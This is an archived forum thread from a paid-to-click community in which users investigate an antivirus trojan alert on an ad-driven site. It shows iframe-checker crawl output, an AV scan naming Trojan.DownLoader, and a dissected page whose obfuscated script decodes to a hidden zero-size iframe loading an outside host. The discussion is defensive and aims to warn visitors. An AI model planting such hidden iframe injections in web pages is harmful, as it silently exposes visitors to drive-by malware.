URL Checked: hxxp://www.AsiaBux.com/?r=netxxx
Got Vastgate and a trojan alert from my AV;
Zeroiframes detected: 8
Check took 31.66 seconds
(Level: 0) Url checked:
hxxp://www.asiabux.com/?r=net2dollar
Zeroiframes detected on this site: 0
Bidvertiser detected (TextAds, not a cheater)
(Level: 1) Url checked: (iframe source)
hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 2) Url checked: (iframe source)
hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine=
http://www.asiabux.com/?r=net2dollar
Blank page / could not connect
(Level: 2) Url checked: (script source)
hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=
extra_info-optional
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
hxxp://www.vastgate.com/vastgate.php?z=1&pl=2952&rl=120
Zeroiframes detected on this site: 5
AdJungle code detected (Ads, not a cheater)
(Level: 2) Url checked: (iframe source)
hxxp://www.wakrah.net
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)
(Level: 3) Url checked: (iframe source)
hxxp://www.wakrah.net/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)
(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=634586&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000010515
Blank page / could not connect
(Level: 2) Url checked: (iframe source)
hxxp://www.usersurf.com
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)
AdBrite detected (TextAds, not a cheater)
(Level: 3) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=469686&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000010952
Blank page / could not connect
(Level: 3) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=469686&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (iframe source)
hxxp://www.fastmega.com
Zeroiframes detected on this site: 2
AdJungle code detected (Ads, not a cheater)
(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/cpx_interactive.html
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 4) Url checked: (iframe source)
hxxp://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=468x60§ion=254980
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 5) Url checked: (script source)
hxxp://adserving.cpxinteractive.com/+rm_url+
Blank page / could not connect
(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/adthin.html
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 4) Url checked: (script source)
hxxp://www.adthin.com/show-ad.php?wid=1006&
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)
(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=467437&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/applyads.html
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 4) Url checked: (script source)
hxxp://applyads.com/pagead/show_ads.php?pubid=fastmegacom&group=468x60&channel=
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (iframe source)
hxxp://www.fastmega.com/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)
(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=467437&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/prototype.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/common.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/progress.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/hint.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/swfobject_source.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/flashupload.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/overlay.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://www.fastmega.com/includes/js/clickedit.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://ads.clicksor.com/bannerad.php?pid=87645&sid=128404&adtype=2
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000009074
Blank page / could not connect
(Level: 2) Url checked: (iframe source)
hxxp://www.taswej.com
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)
(Level: 3) Url checked: (iframe source)
hxxp://www.taswej.com/adbrite.html
Zeroiframes detected on this site: 0
AdBrite detected (TextAds, not a cheater)
(Level: 4) Url checked: (script source)
hxxp://ads.adbrite.com/mb/text_group.php?sid=636373&zs=3436385f3630
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000010522
Blank page / could not connect
(Level: 2) Url checked: (iframe source)
hxxp://www.qatarzone.com
Zeroiframes detected on this site: 0
AdJungle code detected (Ads, not a cheater)
(Level: 3) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000011256
Blank page / could not connect
(Level: 2) Url checked: (script source)
hxxp://adserve.adtoll.com/js/at_ag_1479.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (script source)
hxxp://aj.adjungle.com/aj/zone.jsp?z=jz0000005294
Blank page / could not connect
(Level: 1) Url checked: (script source)
hxxp://bdv.bidvertiser.com/bidvertiser.dbm?pid=9009&bid=282454
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxxp://www.forced-layer.de/sc/lay.php?id=679&aid=977
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (script source)
hxxp://www.forced-layer.de/sc/layerhead.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (script source)
hxxp://www.forced-layer.de/sc/lb.php?id=679&aid=977&bid=
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (iframe source)
hxxp://www.forced-layer.de/sc/frame.php?id=679&kid=78&iid=248&aid=977
Zeroiframes detected on this site: 0
No ad codes identified
Full Version: Asia Bux - Vastgate & Trojan Alert from my AV
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Nasties, trojans, 0iframes and downloads when surfing : Info and discussions
I've seen this before, trying to remember...
CODE
Checking: hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white
Engine version: 4.44.0.9170
File size: 1229 bytes
hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white - archive HTML
>hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white/Script.0 infected with Trojan.DownLoader.28765
Checking: hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL
File size: 2709 bytes
hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL - Ok
Checking: hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine=
File size: 0 bytes
hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine= - the size of the file is equal to zero, skipped
Engine version: 4.44.0.9170
File size: 1229 bytes
hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white - archive HTML
>hxxp://www.hitsformoney.net/banniere.php?ref=paids&fond=white/Script.0 infected with Trojan.DownLoader.28765
Checking: hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL
File size: 2709 bytes
hxxp://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&einfo=Extra_info-OPTIONAL - Ok
Checking: hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine=
File size: 0 bytes
hxxp://www.hitsformoney.net/ban.php?pseudo=paids&origine= - the size of the file is equal to zero, skipped
CODE
Query: http://www.hitsformoney.net/banniere.php?ref=paids&fond=white
Page Title: No HTML title tags found
Server Response: 200 [ OK ]
Server Type: Apache
Server IP: 213.186.33.2
IP PTR: 90plan.ovh.net
Last Dissected: 14/07/2008 23:31:31
<html><head></head><body><!-- Euro-clic.com --><script language=&
quot;JavaScript" src="http://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&ei
nfo=Extra_info-OPTIONAL"></script><!-- Euro-clic.com --><a href=http
://www.hitsformoney.net/index.php?page=inscription&parrain=paids target=_blank><img src='http://www.hitsformon
ey.net/images/banner.jpg' marginwidth='0' marginheight='0' frameborder='0' width='468' height='60' border=-1></a&g
t;
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061
Not posting all of the javascript, but it decodes to:
<script type="text/javascript">document.write(<iframe src="http://perso.orange.fr/lightningbolttraffic/sites/aut" width=0 height=0 frameborder=0></iframe>')</script>
<iframe src='http://www.hitsformoney.net/ban.php?
pseudo=paids&origine=' MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER='0' width='0' height='0' SCROLLING='no'></iframe>
Page Title: No HTML title tags found
Server Response: 200 [ OK ]
Server Type: Apache
Server IP: 213.186.33.2
IP PTR: 90plan.ovh.net
Last Dissected: 14/07/2008 23:31:31
<html><head></head><body><!-- Euro-clic.com --><script language=&
quot;JavaScript" src="http://serv2.euro-clic.com/java.php?bid=1266&uid=291&aid=3200&pid=408&ei
nfo=Extra_info-OPTIONAL"></script><!-- Euro-clic.com --><a href=http
://www.hitsformoney.net/index.php?page=inscription&parrain=paids target=_blank><img src='http://www.hitsformon
ey.net/images/banner.jpg' marginwidth='0' marginheight='0' frameborder='0' width='468' height='60' border=-1></a&g
t;
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061
Not posting all of the javascript, but it decodes to:
<script type="text/javascript">document.write(<iframe src="http://perso.orange.fr/lightningbolttraffic/sites/aut" width=0 height=0 frameborder=0></iframe>')</script>
<iframe src='http://www.hitsformoney.net/ban.php?
pseudo=paids&origine=' MARGINWIDTH=0 MARGINHEIGHT=0 FRAMEBORDER='0' width='0' height='0' SCROLLING='no'></iframe>
lol
QUOTE (kaikka @ Jul 31 2008, 10:46 AM) 
lol
lol = Laugh out loud. Are you implying that it is somehow a laughing matter when there is stuff like this for the unsuspecting member/visitor to land on?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.